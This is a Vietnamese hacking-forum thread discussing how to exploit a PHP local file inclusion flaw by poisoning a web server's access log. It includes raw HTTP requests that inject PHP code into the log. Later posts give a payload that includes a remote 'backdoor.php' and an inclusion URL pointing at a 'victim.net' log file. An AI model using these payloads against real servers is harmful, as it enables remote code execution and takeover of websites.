English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập [Thảo luận] Khai thác lỗi này như thế nào ?!  XML
Go to Page:  First Page Page 1
  [Question]   Re: [Thảo luận] Khai thác lỗi này như thế nào ?! 21/09/2007 08:30:07 (+0700) | #31 | 86010
[Avatar]
 nhuhoang
Elite Member
[Minus]    0    [Plus]
Joined: 27/06/2007 00:49:10
Messages: 111
Location: /dev/null
Offline
[Profile] [PM] [WWW]
mọi người cho hỏi tí nhé. Nếu ta nhập code vào trình duyệt
Code:
http://localhost:80/<?echo('bad_code');?>

thì trong access.log đoạn url trên bị mã hóa:
Code:
127.0.0.1 - - [20/Sep/2007:19:16:40 +0700] "GET /%3C?echo%20%20bad_code%20%20;%3F%3E HTTP/1.1" 403 1106

Còn nếu ta đưa thẳng vào HTTP request
Code:
GET http://localhost:80/<?echo('bad_code');?>/ HTTP/1.1
Accept: */*.
Accept-Language: en-us.
Accept-Encoding: deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)
Host: localhost
Connection: Close

thì trong log lại ghi là
Code:
127.0.0.1 - - [20/Sep/2007:19:12:29 +0700] "GET /<?echo('bad_code');?>/ HTTP/1.1" 403 1106

Như vậy là do trình duyệt sẽ mã hóa url khi gửi đi đúng không?

Còn nữa, trong log file của tui không lưu lại User agent nên cách chỉnh general.useragent.extra.firefox trong about:config của gsmth không thể thực hiện được (tui dùng xampp trên Windows). Thậm chí khi chỉnh lại useragent bằng 1 đoạn code thì sau đó tui không thể vào được HVA, mặc dù các trang khác vẫn vào bình thường. HVA bảo mật ghê thật smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Khai thác lỗi này như thế nào ?! 21/09/2007 18:24:08 (+0700) | #32 | 86072
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

nhuhoang wrote:
mọi người cho hỏi tí nhé. Nếu ta nhập code vào trình duyệt
Code:
http://localhost:80/<?echo('bad_code');?>

thì trong access.log đoạn url trên bị mã hóa:
Code:
127.0.0.1 - - [20/Sep/2007:19:16:40 +0700] "GET /%3C?echo%20%20bad_code%20%20;%3F%3E HTTP/1.1" 403 1106

Còn nếu ta đưa thẳng vào HTTP request
Code:
GET http://localhost:80/<?echo('bad_code');?>/ HTTP/1.1
Accept: */*.
Accept-Language: en-us.
Accept-Encoding: deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)
Host: localhost
Connection: Close

thì trong log lại ghi là
Code:
127.0.0.1 - - [20/Sep/2007:19:12:29 +0700] "GET /<?echo('bad_code');?>/ HTTP/1.1" 403 1106

Như vậy là do trình duyệt sẽ mã hóa url khi gửi đi đúng không?

Còn nữa, trong log file của tui không lưu lại User agent nên cách chỉnh general.useragent.extra.firefox trong about:config của gsmth không thể thực hiện được (tui dùng xampp trên Windows). Thậm chí khi chỉnh lại useragent bằng 1 đoạn code thì sau đó tui không thể vào được HVA, mặc dù các trang khác vẫn vào bình thường. HVA bảo mật ghê thật smilie
 


Nếu đưa URL như trên vào thanh địa chỉ của trình duyệt thì nó được encode -1- ở dạng URLencode bởi vì (hầu hết) các trình duyệt hiện nay đều làm thế.

Nếu đưa URL như trên vào telnet hay netcat hay công cụ tương tự, nó không được encode bởi vì đây là raw request. Thông tin gõ thế nào trên console (telnet hay netcat) thì nó đi đến web server y hệt như thế.

Trên HVA, gần như mọi giá trị được đưa vào HTTP headers đều được kiểm tra và cản lọc. Đây là tính bảo mật. Tuy vậy, nó có cái giá của nó: chậm hơn các site không bảo mật ở mức độ này.

Thân mến.

-1-: từ encode không thể dịch thành mã hóa được bởi vì encode khác với encrypt (được dịch là mã hóa). Tôi chưa thấy từ này được dịch ra tiếng Việt.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Khai thác lỗi này như thế nào ?! 17/10/2007 22:24:29 (+0700) | #33 | 91065
ckj8899
Member
[Minus]    0    [Plus]
Joined: 26/08/2007 15:46:13
Messages: 2
Offline
[Profile] [PM]
Nếu như nó là server riêng,thay đổi mấy cái mặt định thì sao hả mấy anh,chỉ em với
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Khai thác lỗi này như thế nào ?! 17/10/2007 22:42:26 (+0700) | #34 | 91067
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

ckj8899 wrote:
Nếu như nó là server riêng,thay đổi mấy cái mặt định thì sao hả mấy anh,chỉ em với  


Thay đổi mấy cái "mặt" định nào?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Khai thác lỗi này như thế nào ?! 23/10/2007 05:38:53 (+0700) | #35 | 92272
Quan Vân Trường
HVA Friend
Joined: 19/07/2002 10:13:30
Messages: 115
Location: 9:00PM-6:00AM
Offline
[Profile] [PM]
To thiendt:
Bạn nên tìm trên diễn đàn trước khi đặt câu hỏi và cũng nên học cách đặt câu hỏi.
Đây là 1 chủ đề "thảo luận" chứ không phải là 1 chủ đề "hỏi đáp". Các vấn đề "hỏi đáp" không liên quan đến chủ đề xin bạn vui lòng tạo 1 chủ đề mới.
Chú ý không gửi liên tục các bài có nội dung giống nhau.

Thân.
Kernel Panic.
[Up] [Print Copy]
  [Question]   [Thảo luận] Khai thác lỗi này như thế nào ?! 05/09/2008 10:32:40 (+0700) | #36 | 149782
flier_vn
Member
[Minus]    0    [Plus]
Joined: 15/07/2008 01:13:39
Messages: 28
Offline
[Profile] [PM]

gamma95 wrote:
thực ra đề bài QVT cho là thừa dữ kiện, và cái
?html=/home/hostings/webs/victim.net/logs/access_log
của đống chí gsmth
có cách nào đơn giản hơn ko ??
và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko?? 


Có cách nào đơn giản hơn thì em hem bik smilie


và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko?? 


Còn cái này thì em nghĩ là : <? include ('http://link/backdoor.php'); /* ?> or ? include ('$xxx'); /* ?> ! ít nhất thì cũng hay hơn bọn tây kia inject smilie

==> ?html=/home/hostings/webs/victim.net/logs/access_log?xxx=[link] <--- loại được các cái thừa ko cần đến mà log ghi lại !
MerChant.Vn - Website học hỏi, trao đổi thảo luận về kinh doanh.

DànhChoBé.VN - Chuyên bán đồ chơi chất lượng, thương hiệu Fisher price, Disney, Thomas & Friends
[Up] [Print Copy]
  [Question]   [Thảo luận] Khai thác lỗi này như thế nào ?! 20/01/2010 09:15:46 (+0700) | #37 | 203613
Archimonde
Member
[Minus]    0    [Plus]
Joined: 11/11/2009 11:56:23
Messages: 7
Offline
[Profile] [PM]

flier_vn wrote:

gamma95 wrote:
thực ra đề bài QVT cho là thừa dữ kiện, và cái
?html=/home/hostings/webs/victim.net/logs/access_log
của đống chí gsmth
có cách nào đơn giản hơn ko ??
và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko?? 


Có cách nào đơn giản hơn thì em hem bik smilie


và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko?? 


Còn cái này thì em nghĩ là : <? include ('http://link/backdoor.php'); /* ?> or ? include ('$xxx'); /* ?> ! ít nhất thì cũng hay hơn bọn tây kia inject smilie

==> ?html=/home/hostings/webs/victim.net/logs/access_log?xxx=[link] <--- loại được các cái thừa ko cần đến mà log ghi lại ! 


allow_url_include = off
allow_url_fopen = off
thì sao hả bạn smilie
Backdoor phải là .txt chứ sao lại là PHP smilie
[Up] [Print Copy]
  [Question]   Khai thác lỗi này như thế nào ?! 20/01/2010 13:19:13 (+0700) | #38 | 203628
[Avatar]
 PhanPhungTien
Member
[Minus]    0    [Plus]
Joined: 13/08/2008 11:28:57
Messages: 133
Offline
[Profile] [PM]

Archimonde wrote:


allow_url_include = off
allow_url_fopen = off
thì sao hả bạn smilie
Backdoor phải là .txt chứ sao lại là PHP smilie 


Đây là local file inclusion mà bồ, có phải là RFI đâu mà url include ở đây smilie .
[Up] [Print Copy]
Go to Page:  First Page Page 1
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|